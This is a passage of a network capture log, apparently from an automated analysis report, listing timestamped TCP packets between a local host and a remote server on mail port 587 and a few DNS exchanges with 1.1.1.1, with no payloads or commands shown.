Nov 12, 2024 15:32:00.037677050 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.037884951 CET	50792	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:00.042778015 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.285114050 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.286674023 CET	50792	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:00.286755085 CET	50792	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:00.286755085 CET	50792	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:00.287841082 CET	50792	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:00.287841082 CET	50792	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:00.291883945 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.291896105 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.291906118 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.292028904 CET	50792	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:00.292680979 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.292715073 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.292838097 CET	50792	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:00.292838097 CET	50792	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:00.292850018 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.292860985 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.292870045 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.292932987 CET	50792	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:00.293549061 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.293560028 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.293569088 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.293579102 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.293615103 CET	50792	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:00.293692112 CET	50792	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:00.296514988 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.297801018 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.297821999 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.297875881 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.297885895 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.297889948 CET	50792	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:00.297895908 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.297904968 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.297954082 CET	50792	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:00.298043966 CET	50792	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:00.298418999 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.298691988 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.298794031 CET	50792	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:00.298794985 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.298897028 CET	50792	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:00.303118944 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.303158998 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.303376913 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.303389072 CET	50792	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:00.303415060 CET	50792	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:00.303971052 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.304063082 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.304074049 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.304084063 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.304104090 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.304114103 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.304137945 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.304147959 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.304207087 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.304217100 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.304956913 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.304968119 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.304976940 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.308298111 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.308310986 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.308324099 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.308353901 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.308445930 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.308495998 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.308554888 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.308564901 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.308584929 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.811234951 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:00.970724106 CET	50792	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:01.192864895 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:01.192945957 CET	50792	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:02.883836985 CET	50792	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:02.888814926 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:03.131268024 CET	587	50792	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:03.131714106 CET	50792	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:03.132894993 CET	50793	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:03.138189077 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:03.138262987 CET	50793	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:03.964684010 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:03.966089010 CET	50793	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:03.971898079 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:04.204843998 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:04.205902100 CET	50793	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:04.210776091 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:04.443124056 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:04.445791960 CET	50793	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:04.450716972 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:04.693402052 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:04.693432093 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:04.693443060 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:04.693500042 CET	50793	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:04.693603992 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:04.693648100 CET	50793	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:04.693691015 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:04.695815086 CET	50793	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:04.700669050 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:04.933374882 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:04.935852051 CET	50793	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:04.940757990 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:05.172060013 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:05.172359943 CET	50793	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:05.177187920 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:05.408937931 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:05.409244061 CET	50793	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:05.414151907 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:05.663909912 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:05.668131113 CET	50793	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:05.673388958 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:05.905318975 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:05.905651093 CET	50793	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:05.910598993 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.151913881 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.153933048 CET	50793	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:06.158859968 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.391212940 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.394068956 CET	50793	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:06.394118071 CET	50793	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:06.394118071 CET	50793	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:06.395349979 CET	50793	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:06.395349979 CET	50793	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:06.399185896 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.399198055 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.399209976 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.399322033 CET	50793	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:06.400307894 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.400322914 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.400444984 CET	50793	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:06.400454044 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.400470018 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.400486946 CET	50793	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:06.400547028 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.400557995 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.400582075 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.400592089 CET	50793	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:06.400593042 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.400619030 CET	50793	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:06.400631905 CET	50793	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:06.404026985 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.404069901 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.404109955 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.404160023 CET	50793	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:06.405349016 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.405359983 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.405435085 CET	50793	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:06.405452013 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.405453920 CET	50793	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:06.405509949 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.405574083 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.405699015 CET	50793	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:06.405731916 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.405831099 CET	50793	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:06.405900955 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.406013966 CET	50793	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:06.410077095 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.410129070 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.410346031 CET	50793	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:06.410420895 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.410566092 CET	50793	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:06.410651922 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.410677910 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.411006927 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.411082983 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.411118031 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.411173105 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.411228895 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.411238909 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.411293030 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.411300898 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.411355972 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.411365986 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.411406994 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.411417007 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.415276051 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.415287018 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.415327072 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.415335894 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.415388107 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.415433884 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.415529966 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.415544033 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.415574074 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.415584087 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.415601969 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.415611982 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.415667057 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:06.910377979 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:07.082307100 CET	50793	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:09.826375961 CET	50793	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:09.831327915 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:10.083832026 CET	587	50793	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:10.084475040 CET	50793	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:10.085352898 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:10.090209007 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:10.090297937 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:10.910260916 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:10.955463886 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:10.960463047 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:11.198405981 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:11.332357883 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:11.455918074 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:11.460999966 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:11.699691057 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:11.700098991 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:11.705064058 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:11.955322027 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:11.955379009 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:11.955390930 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:11.955506086 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:11.955542088 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:11.957986116 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:11.967160940 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:11.972182035 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:12.213074923 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:12.215198040 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:12.221043110 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:12.459188938 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:12.459425926 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:12.464194059 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:12.726723909 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:12.726975918 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:12.732068062 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.104784966 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.105143070 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:13.109999895 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.347909927 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.349989891 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:13.354856014 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.600117922 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.600415945 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:13.605561972 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.848941088 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.849258900 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:13.849330902 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:13.849330902 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:13.849469900 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:13.851069927 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:13.854253054 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.854264975 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.854274035 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.854329109 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.854336023 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:13.854410887 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:13.856049061 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.856060982 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.856093884 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.856105089 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.856147051 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:13.856147051 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:13.856182098 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.856197119 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.856224060 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.856237888 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.856262922 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:13.856309891 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.856313944 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:13.856403112 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:13.859278917 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.859343052 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.859385967 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:13.859437943 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:13.861146927 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.861263037 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:13.861272097 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.861335993 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.861361980 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:13.861375093 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:13.861470938 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.861488104 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:13.861548901 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.861584902 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:13.861685991 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:13.864289045 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.864393950 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.864417076 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:13.864470005 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:13.866139889 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.866184950 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.866241932 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:13.866283894 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.866379976 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.866421938 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.866440058 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.866450071 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.866580963 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.866673946 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.866725922 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.866776943 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.866928101 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.866938114 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.866952896 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.867011070 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.867079020 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.867089033 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.867099047 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.867110014 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.867124081 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.867141962 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.867163897 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.869368076 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.869384050 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.869461060 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.870954990 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.871140003 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.871241093 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.871253014 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.871519089 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:13.871530056 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:14.402667046 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:14.493916035 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:19.743222952 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:19.748158932 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:19.987050056 CET	587	50794	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:19.987544060 CET	50794	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:19.987801075 CET	50795	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:19.992702007 CET	587	50795	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:19.992816925 CET	50795	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:20.813045025 CET	587	50795	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:20.813236952 CET	50795	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:20.818358898 CET	587	50795	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:21.055373907 CET	587	50795	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:21.055490971 CET	50795	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:32:21.061645031 CET	587	50795	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:21.317868948 CET	587	50795	51.195.88.199	192.168.2.5
Nov 12, 2024 15:32:21.363568068 CET	50795	587	192.168.2.5	51.195.88.199

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 12, 2024 15:28:09.700973988 CET	54574	53	192.168.2.5	1.1.1.1
Nov 12, 2024 15:28:09.729794979 CET	53	54574	1.1.1.1	192.168.2.5
Nov 12, 2024 15:28:17.217361927 CET	49450	53	192.168.2.5	1.1.1.1
Nov 12, 2024 15:28:17.224389076 CET	53	49450	1.1.1.1	192.168.2.5
Nov 12, 2024 15:28:21.169820070 CET	51176	53	192.168.2.5	1.1.1.1
Nov 12, 2024 15:28:21.248305082 CET	53	51176	1.1.1.1	192.168.2.5
Nov 12, 2024 15:28:29.406001091 CET	65489	53	192.168.2.5	1.1.1.1
Nov 12, 2024 15:28:29.413589001 CET	53	65489	1.1.1.1	192.168.2.5
Nov 12, 2024 15:28:37.658745050 CET	62041	53	192.168.2.5	1.1.1.1
Nov 12, 2024 15:28:37.667133093 CET	53	62041	1.1.1.1	192.168.2.5
Nov 12, 2024 15:28:56.575371027 CET	53	60933	162.159.36.2	192.168.2.5
Nov 12, 2024 15:28:57.451858044 CET	53	60759	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
